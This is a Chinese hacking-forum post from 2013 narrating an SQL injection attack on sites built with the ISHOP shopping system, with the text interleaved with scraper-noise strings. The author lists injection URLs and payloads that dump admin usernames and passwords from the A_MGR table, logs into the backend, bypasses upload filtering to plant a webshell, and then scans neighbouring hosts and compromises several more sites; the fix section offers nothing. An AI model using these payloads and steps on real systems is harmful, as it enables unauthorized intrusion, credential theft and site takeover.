中国网络渗透测试联盟

标题: ISHOP商场建站系统注入漏洞 [打印本页]
作者: admin    时间: 2013-4-4 17:40
标题: ISHOP商场建站系统注入漏洞
发现一个注入点" M- u+ K% c3 E/ y# Z2 H
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
6 x  T8 U: O3 G! b9 X1 w
- q# d2 M% R1 L' @0 P习惯性的加’having1=1--$ V6 ~) S0 _' N, r- A# z" k
( [- m. a, n+ X2 Y1 k& [! T: g
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
6 A& f# s1 p) a1 f% u( \4 a. r3 g$ I2 U1 h5 F, X& O$ x, a
0
5 o3 p7 _! j+ _" n
3 V2 o) b0 f- {. \% H爆出Diary_A.dl_Title(这时候很激动啊)
! [! m- ?% l8 S* X0 p
5 n- a& ]  A- e" [3 L9 J& }- e那么继续
% Y& S, h. {1 {" P" }' W# P. ghttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—# l, v9 W* Q/ P0 O

5 s& ?7 d. q) r! O) e. F/ A% ]继续,一直爆下去
. Z  k& \( K5 @& h
# E- z, v3 b. y) k1 b爆到几个字段和表段 但是没找到需要的管理用户的字段
& O3 W0 u9 o0 l7 F; _& n4 I
. h) c; z: J  I$ N蛋疼了 怎么办 然后去后台登陆页看源码
& J- L, |" M4 J& p4 n2 a% ]% Y5 l0 \) z5 D" ~3 b1 ?' `. o' R
0. C1 Q# ]* a0 `" r7 R5 D1 T5 J

3 s  A! z) y1 R3 t* qInput name= “ADUID”% t% z8 o& \! q- L  ^7 q, u$ |
Input name= “ADPWD”0 D) v% ~! ]' K: G
( {! f; P) N  C% E8 U; C2 t
很幸运 找到了字段那就继续8 o5 ?4 z: W& J0 h* v
找到之后开始爆用户
: ]. D4 b: H3 s/ m  {http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—; H  Y9 b1 a. v" z
爆密码
0 ?- c/ V7 s2 _) U' Khttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
6 l# Z) {* X/ E' K) b" c2 U测试了下 这个注入点只能爆到文章哪里的表 ; B; }& L, v5 y/ n5 w
% w. ]: \5 M' u0 _. `" R; m4 \$ i
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
$ @+ h& e: f. G; N: f
% E; w# v& _( q) N又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
( h0 J, F' z# V5 K
1 p- m9 Q; E$ t( H8 f) J473
1 Q4 a; E2 k2 `7 U7 L" U- V- F/ d6 ^- ]6 m
进后台/ q# D# d. d# X+ M, A7 O+ v

' K# F4 |6 q! W* }5 p* Z- h) i6 h; B9 b
5 b. a; ~! u4 G9 J发现几个上传点 有的地方不能上传 而且防止恶意代码
2 Z- X" v& E( ~, l- y# Q/ `
- f4 @. M2 `! w9 a* f没办法 各种百度各种找大牛 找到一只好像可以突破的马
; Q" K: d1 O" E# F0 h
9 Z( }) D% {# v. x$ p/ E# I; [# M/ d; F( @! F; ]! c7 |
在系统管理那里直接上传 不过没有显示地址$ ]+ P  g" ~- m- \% Q

& m7 b: H2 g2 |& v. y% w. H, c再上传一次 抓包 搞定OK
( @5 e0 N, M0 K2 B3 D% s( i
9 ~& `6 X6 m/ a0 s: O; e. I( {/ B! ~; z

  g% d  j* N! @# `4 r& `/ G472# F6 E% Y5 _7 A$ P: K
. A7 ^" ^$ I/ b* Y
晚上不行了 去睡觉。。。9 @( d  H; ]- r7 u. v5 Y! ^
第二天刚起床 闲的没事做继续日站吧
1 v9 [; z6 u! P; F
2 G4 q( [0 j6 x$ b+ ]找个站 就把这个站的旁c扫了下$ B# |& l1 f) E( S' V

6 n8 G- I$ M- J' H0 G发现c段也有一个购物站 ,然后还和这个站的模板差不多
! w2 g" [: ^( Q! z6 ], ?& T  h% }6 t& p! c) u) w
就找到会员登录口测试
0 f  y: o+ n, W& k
! N( \+ R: R2 ?3 L; r# L& z'and (select top 1 MGR_UID from A_MGR)>0—# c# Y9 Z# Q; V- |; g
果断爆到了 这时候我很激动 通杀8 l+ s" K- c# B; U

( r$ i2 P/ y. ]+ Q/ g+ h4 B, X再次翻c段
# Z( P. Q! z3 ]  P* w
5 X% O! [- }9 [5 h( H" i6 P* }翻出几个站 都成功拿下  Y5 }9 O" l- n; p9 q5 [5 A! W

7 I& i; |" {5 Y$ U0 T5 D  i# U1 n) K8 V5 ^

2 @& E/ S! k- |; s5 Z+ G" [) ?2 T修复方案:$ t/ K/ V% ]( _: r8 n
他们比我专业
& a" Z, C; B7 X/ n5 c0 ~7 @5 f' Y( F/ r: U  g9 U& O
& t& H/ a& B8 Z* w

0 d9 o. {4 {0 q4 g



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2